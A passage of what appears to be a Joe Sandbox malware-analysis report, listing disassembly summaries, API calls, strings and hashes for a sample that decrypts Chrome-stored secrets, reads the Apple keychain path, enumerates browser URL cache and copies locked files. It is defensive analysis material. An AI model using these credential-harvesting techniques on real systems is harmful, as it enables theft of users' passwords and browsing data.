                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                      • memset.MSVCRT ref: 00445986
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                      • API String ID: 1963886904-3798722523
                                                                                      • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                      • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                      • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                      • API String ID: 2744995895-28296030
                                                                                      • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                      • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                      • String ID: chp$v10
                                                                                      • API String ID: 1297422669-2783969131
                                                                                      • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                      • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                      APIs
                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                      • API String ID: 3849927982-2252543386
                                                                                      • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                      • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                      • String ID:
                                                                                      • API String ID: 3715365532-3916222277
                                                                                      • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                      • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                      • String ID: bhv
                                                                                      • API String ID: 4234240956-2689659898
                                                                                      • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                      • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                      APIs
                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 2941347001-70141382
                                                                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                      • String ID: visited:
                                                                                      • API String ID: 2470578098-1702587658
                                                                                      • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                      • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                      APIs
                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                      • memset.MSVCRT ref: 0040E1BD
                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                      • free.MSVCRT ref: 0040E28B
                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                      • _snwprintf.MSVCRT ref: 0040E257
                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                      • API String ID: 2804212203-2982631422
                                                                                      • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                      • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0041249C
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
